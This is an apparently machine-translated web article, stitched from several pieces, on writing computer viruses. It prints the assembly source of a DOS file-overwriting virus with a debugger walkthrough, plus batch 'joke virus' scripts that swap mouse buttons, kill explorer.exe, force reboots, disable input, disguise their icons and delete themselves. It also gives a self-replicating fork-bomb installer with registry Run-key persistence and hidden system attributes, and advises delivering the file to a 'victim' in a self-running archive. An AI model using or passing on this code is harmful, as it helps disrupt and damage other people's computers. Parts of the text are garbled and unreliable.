How to create a virus? Computer viruses. How to make a joke virus. How to create and write a computer virus? How to make viruses in notepad like bat

“He rode somewhere for a long time in an uncomfortable hard package, he was shaking and rocked, his body demanded food. He did not understand why he, who had just been born, was thrown out of the house... Finally, the shaking stopped, and someone else and the rude one opened the archive attached to the letter. A young, curious virus poked its head out and made its first division..."

In this article I will share my experience of writing viruses. The basic principle of the operation of any virus can be expressed in a few words: the body of the virus is treated as code during its execution, and as data during infection. There are many types of viruses and different methods of infection. Naturally, the very mechanism of the virus’s actions depends on the specific operating system. There are, for example, viruses that work in the protected mode of the processor (maximum mode
privileges and absolute addressing of all memory). Companies like AVP have to spend a lot of time and resources treating such instances. The only thing that saves the creators of antiviruses is the very small number of truly professional viruses.

In order to learn how to write viruses yourself, you only need to know the basics of assembler. I mean that with basic knowledge you can try to write your own viruses and research existing ones. Other useful, and sometimes necessary,
knowledge will come as you study other people's creations. Among the resources on this topic, I can recommend a page containing a huge number of books and articles:
http://vx.netlux.org/lib_rus.shtml.
All her documents are written in a very understandable and accessible language.
language. There is also a well-known electronic magazine, Infected Voice. It has a convenient navigation system that allows you to navigate new materials (sources and articles). This magazine is published once every six months (at least it used to be, I’m not sure now) and contains all the innovations in this area.

Suppose you found the source of a virus and want to investigate it. How to do this? To be honest, I myself encountered such a problem for the very first time. My question became this: I have the text of a virus, I want to see how it works, and at the same time I’M AFRAID OF IT! This is completely real: what will prevent this virus from burning my CMOS or rubbing my screw? Answer: nothing. If you act incorrectly, the virus can cause you the harm it is programmed to do. However, the algorithm for correct actions is quite simple. Now we will figure it out.

We will assume that the source code of the virus is written in assembly language. This language is ideal for writing viruses. As is known, in
assembler has only two commands that call “real” (meaning actions that can produce
irreversible changes on the hard drive or somewhere else) are “INT” and “OUT”, all other commands work with processor registers and flags (albeit quite roughly, but by and large true). We do not consider WIN API functions, since they can, in principle, be considered a replacement for DOS interrupts, and calling them is a replacement for the command
"INT".

A little information for beginners or those who have not written on ACMA for a long time: the “INT” command is used to call DOS or BIOS interrupts, and the “OUT” command is used to write data to the port. In this case, for the "INT" command, the function number is indicated in the AH register (most often), and
for the "OUT" command, the AL, AX, EAX registers store data written to the port.

So. Take any debugger. Since first you need to understand viruses under DOS (they still work under
Win), then any debugger will do: Turbo Debugger from Borland Inc., CodeView from MicroSoft, AFDPRO or AVPUTIL. Next, load the source into the debugger and trace it step by step. The main thing is to stick to ONLY ONE RULE. It can be called golden.
ATTENTION: you can safely execute the source code of your virus, but as soon as you reach the “OUT” or “INT” commands, immediately stop and start analyzing.

You must analyze:

• number of the called interrupt or recording port;
• number of the function called or data written to the port.

In order to understand the real actions of these commands, use either Tech Help, or any ASMA document, or any
book. The main thing is that you can find information on all interrupts and ports in your source.
So you can understand what will do
the following command without executing it on your computer. While tracing, record all data (register states, command addresses,
called functions, etc.) on a piece of paper. Then, by the time you call the function (or write to the port), you will be fully armed and will be able to determine what will happen if you execute the following command. This will also help you with a comparative analysis of changes in registers and flags.

Once you understand what a command does ("INT" or "OUT"), skip it and move on until you
you will meet the end of the file or the next such command. As a result, you will be able to sort any virus into pieces and understand its functioning.

Let's look at an example. For this purpose, I took a small virus written by a certain Reminder. I got it from the eleventh issue of Infected Voice. He was there without comment, so I had to do all the work myself. What me
What attracted me to this creation: the very small source code, the very small size of the compiled executable, the incomprehensible (at first glance) algorithm. Here is its source code (by the way, it is called REM22):

Model tiny
.code
.startup
start:
pop cx
hel:
xchg ax,bx
db 108h shr 1
db 4eh ; dec si
db 9eh shr 1
db 3ch ;cmp al,xx
db 100h shr 1
db 40h
fmask db "*.*",0
lodsw
cwd
mov dl,al
shl dx,1
int 21h
jmp hel
end

This virus, in my opinion, is a masterpiece, because with such a small size
organizing the reproduction mechanism is truly a work of genius. When we now figure out what and how he does, everything
will fall into place. In the meantime, it should be noted: in principle, this virus does not carry out any destructive actions (I think reproduction cannot be considered such), but it infects all files
in the same directory. It is not a “professional” virus, that is, it lacks many mechanisms characteristic of serious creations:

• there is no “friend/foe” mechanism (the virus infects everyone indiscriminately, even itself or already infected objects);
• the infection occurs only in files in the same directory (try compiling it and running it in a folder where, in addition to it,
  there is no one :));
• the virus is not polymorphic (does not encrypt itself and does not change its code);
• the virus does not have destructive effects;
• the virus is not resident.

Let's take a look inside our
overwriter. The source is a model for creating an exe file. ".startup" is a TASM directive, you can do without it, but then you have to write "org 100h" and then put a mark (and
at the end, after "end", put the name of the label). The rest of the commands can be easily found in any book and see what they do (don’t be lazy). All that remains is to figure out what these teams do together as a whole.

This masterpiece is an ordinary cycle that is repeated 6 times. What happens in the cycle? What happens is that we call int 21h with six different functions (93, 4E, 3C, 40, 2E, 00). Let's look
in order, means:

"pop cx" is only for resetting cx (at the top of the stack, as you know, at the beginning of the program there is a zero). For what? And in order to get CH=01 on the SUB CH command (look for it, it should be at offset 108h in the debugger) (at offset 2Ah (this is in the PSP somewhere) FFh is always located), i.e. You can not show off and just write sub ch,ffh, but this will change the program code... It turns out:
*.*,0 = sub CH,, and this is a ready-made mask for searching... THAT'S WHERE THE GENIUS IS!!!

That is, sub ch,ffh is "Ae" (in ASCII codes with a space at the end). Further, everything that goes from offset 101 (code 93) to offset 10B (code 00) is FUNCTIONS FOR int 21h!!! Those. these are 6 functions that we call in turn in a loop (see their numbers above), and the code that comes out is just tinsel. This makes ABSOLUTELY NO SENSE! THIS IS WHAT HAPPENED IF YOU ASSEMBLED THE FUNCTIONS IN A ROW. That is, if I write TANAT, it will translate into a sequence of some commands, right? But this is essentially data... although in this program you can’t even call it data, these are just FUNCTIONS for int 21h, that’s what
GENIUS!!! There is no point in telling further - because in each of the six cycles a function is called, and all the registers are approximately
tailored to ideals... Look:

For the first time, the 93h function is called: Pipe (Error) - for the program itself, it DOES NOT PERFORM ANY LOAD, DOES NOT DO ANYTHING USEFUL, IT’S JUST EXCESSIVE, IT’S NOT NEEDED, IT’S AN EXTRA CYCLE, BUT CONSIDERING the genius of the code, it simply ARISES BY ITSELF AND YOU CAN'T GET ANYWHERE FROM HER!!! There will be another such “left” function - see below.

Second: 4Eh - this is what we need! Search for a file, and at the time of the call, the offset of the file mask (108h) is found in dx!!!

Third: 3Ch - file creation. This is another "left" function. We don't need her. There is no need for us to create a file (after all, we only need to write ourselves into the file that we found in the previous step). In DX there is some left-handed garbage, naturally with
the file name has nothing to do with it, so CF=1 and we move on to the next loop.

Fourth: 40h - Write to file. But this is what we need already! DX contains an offset of 100h (i.e. the beginning of REM22), but CX is a little disappointing - it is equal to 400h, i.e. actually to the beginning of the found file
400h bytes will be written, while REM22 takes only 22 bytes, i.e. 1002 extra bytes will be written. That's true. But given the genius of the code :), this can be forgiven.

Fifth: 2Eh - Set Verify Flag. This is the LEFT MOST function, here it is simply the appendix of the program.

Sixth: 00h - this turns out to be an exit from the program (I didn’t know either).

That's all: that is, we have 6 cycles, of which only 3 are meaningful: search, record and exit.
Most likely you will miss a lot
clear. To figure it out, load the source into the debugger, trace it, look
For the status of the data in the registers, look at my comments. Then everything will become clear. In conclusion
I’m providing a debugging table so you don’t have to create it yourself (you’ll see what it should look like). In principle, one should be enough,
to understand what is happening in this virus, but I think comments will not be superfluous.

Oddly enough, not only computer geniuses and smart programmers are interested in information about how to create a virus, but also ordinary personal computer users. Sometimes vindictive people deliberately intend to harm the victim by creating malicious software, but most often this is just a cybernetic hoax. Any penetration into a computer by third parties or deliberate harm to software is punishable by the laws of many countries. This article on how to make a virus can only be used to help the user understand how Windows NT commands are used.

Creation of a virus

Every novice PC user can create their own computer virus. To do this, it is not at all necessary to have knowledge of programming. It is enough to have the desire, a little free time to understand the simplest commands, and, of course, a computer. This article will teach you how to create a virus in Notepad. In this case, we will work without various interpreters; we will not place the code in specialized development environments. What is the essence of this method? Our program (virus) will be executed by converting a text file into a Windows batch file with an extension (*.bat). After it is launched, all events that you specify in the executable file will be executed. Now you know in theory how to create a virus, then you can move on to a more detailed study of this topic. I want to warn you that these viruses are not intended for serious things. Although they can harm your computer, the scale of the tragedy is small. You will not be able to steal information from the victim, much less spy on him. It's time to show you how to create a virus. To do this, I advise you to learn how to use Windows NT control commands, some of which will be described below. Open a regular text editor and type the following command in it: @echo off.

Congratulations, you have disabled the progress screen. Now, after running your virus, the victim will not know about the execution of the malicious code, because the entire process will be hidden from his eyes. Next, on a new line, type the following code: %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul.

There is no point in explaining each command, but the gist of it is that your mouse buttons are now programmed in reverse order (the button assignments have been swapped). Now save this file and change its extension (instead of *.txt put *.bat). Here is a Windows batch file, after running which your mouse will not work properly. You got a clear example of how to create a virus, and if this interests you, you can continue to study these kinds of commands and dig deeper into this niche. If you want to seriously scare your victim, you can add the following lines:

taskkill /f /im explorer.exe >nul
shutdown -r -t 1 -c "lol" -f >nul

The first line is to disable the "explorer.exe" process, and the next line is to simply restart the computer. Your task is to add new commands to your virus from a new line, then save the file and change its extension. You're almost a hacker. Now let's slip this file to the victim. You must place the created file with the bat extension in a special SFX archive, after selecting the “Run after unpacking” option. Now the victim’s computer will be automatically infected with this virus after opening the archive. All that remains is to send our “gift”.

Everything has already been invented

But why reinvent the wheel if experienced programmers and hackers have made our lives so much easier? In the public domain, you can easily find a program called “Kuzya Virus Generator”. You will not need to write all the commands manually. You just need to select the desired action, and the program will automatically create this malicious file for you.

This is software whose purpose is to gain unauthorized access to computer resources or information on the hard drive. It is often created to cause harm by copying, distorting, deleting, or substituting information. Let's look further at how to create a joke virus and protect yourself from viruses.

What is a virus

Before you create a virus, you need to define exactly what it is. For a program to be considered malicious, it must:

• destroy information or disrupt computer operation;
• be carried out without warning;
• have a clear purpose of unauthorized access or destruction of information.

Computer viruses must meet all of the above criteria. For example, a copy protection cracker is not malware. It does not destroy files, but only selects a password to unlock it. Also, a disk formatting program cannot be considered malicious. It destroys data on the computer, but is performed with the user's consent. If a program destroys information due to internal errors, it is also not considered a virus. Although the developers may be liable for negligence in their work or as violators of consumer rights, because the program could delete important data. In general, clear criteria have not yet been defined. In order for a program to be considered a virus, a software and technical examination is carried out.

Types of viruses

Why are viruses created? There are many reasons. Some of the malicious files are truly dangerous and can harm the performance of the machine, while others cause harm indirectly. List of main goals:

1. Destabilization.
2. Installation of other malware.
3. Theft, fraud, espionage.
4. Adware.
5. Other.

Computer viruses create interference, this can be the reasonless opening and closing of the disk drive, or hardware failure.

Some programs behave quite cunningly. Downloading media files from an infected link may result in the download of malware.

To steal any information, scanning the hard drive, registering keystrokes, and redirecting the user to a fake website are used. Thus, accounts are stolen and used to send spam, payment systems are hacked, computers are blocked in order to extort money. This can be paid software that does nothing useful after downloading.

Due to a corrupted file, a public proxy server can be set up on a computer, the machine will become a member of a botnet and will be used to carry out DDOS attacks. With the popularization of Bitcoin, cases of hidden mining on users’ PCs have become more frequent.

There are also programs that display advertisements or collect various information for marketing purposes.

How to create viruses

In Notepad (or rather, in any text editor) you can create a malicious program, and you can do this in the same way as you create regular programs. Any programming languages ​​are used. Usually this is C++, but can be Delphi and .Net. The purpose of creating a virus could be as a joke or as an introduction to how it works. A simple program is written directly in Notepad, and the code itself takes up very few lines.

You can completely prevent a virus from getting onto your computer by turning off the Internet and refusing to use illegal software. Files containing viruses can function without an Internet connection. In this case, they will damage the information on the user’s hard drive or cause programs to function incorrectly.

Today, the main goal of hackers is not the development of destructive programs that clearly harm the operation of the system, but the creation of products that behave quietly. They can work for a long time and at one point cause very serious harm.

Signs of infection

Before creating a virus, attackers analyze all the ways in which it can be detected and try to bypass them. Antiviruses effectively find malicious files, but due to user error, some of them may be added to exceptions. In order to react in time that your computer is infected, you need to monitor suspicious and strange actions.

The most obvious signs of infection:

• opening windows with unfamiliar content;
• blocking access to sites;
• third-party processes in the "Task Manager";
• new entries in autorun;
• inability to make changes to computer settings;
• Random computer restart or shutdown.

Some of the symptoms may be caused by a joke virus and do not pose a clear threat to the system. And some of them are used to distract attention while the main virus collects data about the user.

Spread of viruses

The attack has several stages. The first answers the question of how to create a virus, that is, this is a technological stage. The second stage delivers malware to the computer. The main ways viruses spread:

• exploit uses vulnerabilities in software, with the help of which it seizes control over the system and disrupts its functioning;
• a logic bomb is triggered under a certain condition, it is inseparable from the carrier program into which it is integrated;
• a Trojan program penetrates a computer under the guise of legitimate software, very often as part of a whole planned multi-stage attack;
• Worms spread independently through local and global networks using administrative errors and social engineering tools.

Prevention and treatment

There are antiviruses to protect against viruses. They effectively protect the system, but, as a rule, the user himself is to blame for infecting the system. Therefore you need:

• install updates in a timely manner and use licensed copies;
• work on the computer with user rights, not administrator rights;
• open computer files only from trusted sources;
• use a firewall.

How to make a joke virus

A virus is, first of all, a program that changes the contents of any files. It is created in the same way as any other program. The simplest versions of malware can be created in Notepad. This does not require special skills or knowledge of programming languages.

How to create viruses in Notepad?

The following lines will create 1000 folders in one second, which will confuse the user:

How to create a virus to steal passwords? It is already more difficult to answer this question. To do this, you need to think about how the user will launch the malicious file and how the data will be stolen. Only then can we begin implementation. This is a very complex process. In addition, it may be illegal, so we do not recommend that readers create viruses for any purpose (except, of course, for educational purposes).

Viruses are written, as a rule, in order to ruin the life of another - to “eat up” free space on his PC, disable the system, “hack” passwords, etc. Despite such consequences, there are viruses created just to have a laugh over a friend. Such a virus is written in five minutes, and it does not do anything critical to the system. The most common joke viruses are turning off the PC, opening the same program multiple times, and displaying funny text.

Such simple viruses are created in a standard Notepad, except that they are saved not with .txt resolution, but in the .bat batch file format.

How to make a virus

Let's consider step by step how to write a virus that opens one application multiple times.

1. Open Notepad - to do this, right-click on the desktop and select "New" → "Text Document".
2. We begin to fill our virus with commands
   • @echo off //disable command output in this line
   • echo "process started" //text that the user will see
   • start mspaint
   • goto:p //run the paint program multiple times
   • pause //press any key
   • del %0 //virus self-destruction
3. For the saved file, change the icon to a more popular one (browser, word, etc.) and enter the appropriate name.

A few more possible draws:

Some kind of screensaver from the movie "The Matrix"

• @echo off
• color 2
• echo 1185585851851891704148 1185585851851891704148
• echo 1185585851851891704148 1185585851851891704148
• echo 1185585851851891704148 1185585851851891704148
• echo 1185585851851891704148 1185585851851891704148
• echo 1185585851851891704148 1185585851851891704148
• echo 1185585851851891704148 1185585851851891704148
• echo 1185585851851891704148 1185585851851891704148
• goto:a
• pause

Changing the operation of mouse buttons

• %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Time change

• time 0:00

Disabling the keyboard

• rundll32 keyboard,disable

Disabling the mouse

• rundll32 mouse,disable

We looked at the simplest and most harmless ways to spoil a friend. In fact, by studying the system commands, you can irrevocably “destroy” the system on someone else’s computer (and even on your own through negligence).

You can also learn about the existence of different types of viruses from the article, but you should not delve into this topic so as not to create unnecessary problems for yourself and others. It is better to take care of protecting your own computer and install a reliable anti-virus program so that you yourself do not fall for the prank of a friend or enemy.

Creating the simplest viruses does not require special software development environments. And special knowledge, by the way, too. Creating viruses is quite simple if you use the command line. To do this, you need to know a little command line syntax and be able to create .bat files.

What is a .bat file and how to create it?

Very superficially, these are files with the .bat extension. Such files carry commands that must be executed by the Windows command interpreter. All those commands that can be executed in the command line window can be entered into a .bat file and run. The result will be the same.

To create a .bat virus, we need a regular text editor. Ideally, Notepad is suitable for these purposes. Having created and opened a new text document, you need to enter there the code (commands) that it should execute. After this, you need to use the menu Save as save this file by giving it a name with the extension .bat and specifying the file type All files.

Creating a simple virus

In this article we will look at creating a virus that, once launched, will endlessly open a command line window. Command line windows that open endlessly and very quickly will not allow the user to work in peace. No one will have time to close them all, and very soon they will fill up the computer’s RAM, which in turn will greatly slow down the computer’s operation, even to the point of completely freezing. It will look something like this:

In addition, we will add our virus to autoload, which will ensure that the virus automatically starts along with the operating system.

Code of the created virus

How many programmers, so many different solutions can be invented for each problem. I will give one of my methods for solving such a problem.

md c:\papka
echo start c:\papka\virus.bat>c:\papka\virus.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v virus /d c:\papka\virus.bat
attrib +r +h +s c:\papka
attrib +r +h +s c:\papka\virus.bat
start c:\papka\virus.bat
del %0

Now let's look at the code itself. The first line creates a folder named papka at the root of the disk C:/. This address is provided as an example only. Using the root of the C:/ folder is not a very good option for a virus. If you want to ensure good survival of your virus, it is best to hide it away. You can even skip the first command if you drop the virus itself into an already created directory.

The second line creates the file c:\papka\virus.bat and, using the echo command, enters the command into it start c:\papka\virus.bat. Here you need to know that after the > sign the location of the output of the given command is indicated. Here you need to get acquainted: c:\papka\virus.bat and there is the main body of the virus. The .bat file with the code we created, which we are now analyzing, is just the installer of our main virus. You can use a different name and location for the virus.

The third line puts the virus body we created in the second line into autoload. For this, a user registry branch is used, since the user always has access to it. But using computer startup is not safe, since the user may not have administrative access, which will cause an unnecessary error.

The fourth and fifth lines of code change the attributes of the virus and the folder where the virus is stored. With these commands, and for this we use , we add attributes Read Only, Hidden and System both for the folder and for the virus. Attribute Usage r(Read only) optional. And here are the attributes Hidden and Systemic will protect the virus we created well. If you don’t believe me, then read the article about the virus that . He uses exactly this technology.

The 6th line of code launches our virus. You can skip this point if you want the virus to run for the first time only after you restart your computer.

And finally, the last, 7th line removes this .bat virus. This is useful, because using this .bat file you can easily find the virus we created and remove it.

The meaning of the created virus

The point of the virus, which fits into these 7 lines, is to create the main virus, protect it and ensure its constant operation. And also cover your tracks. What does the main virus do? After the main virus starts, it executes the command that is written into it. And this command, in turn, launches our virus, which again launches itself again. And so on ad infinitum.

How to fight such viruses?

Firstly, the fight against this virus will begin after it starts. Very soon the virus will fill your RAM with copies of it and you won’t even be able to move your mouse. Therefore, such a performance must be stopped immediately. The Break button on your keyboard is perfect for this. Press it as long as necessary so that new copies stop being created. On keyboards without a Break button, the keyboard shortcut Ctrl+C can help.

How to remove such a virus?

You can through its entry in startup (more details at the link). You can also find the virus using a command that will be displayed in the command interpreter window. Naturally, if you can get to the hidden and system file. This is how a simple virus is created.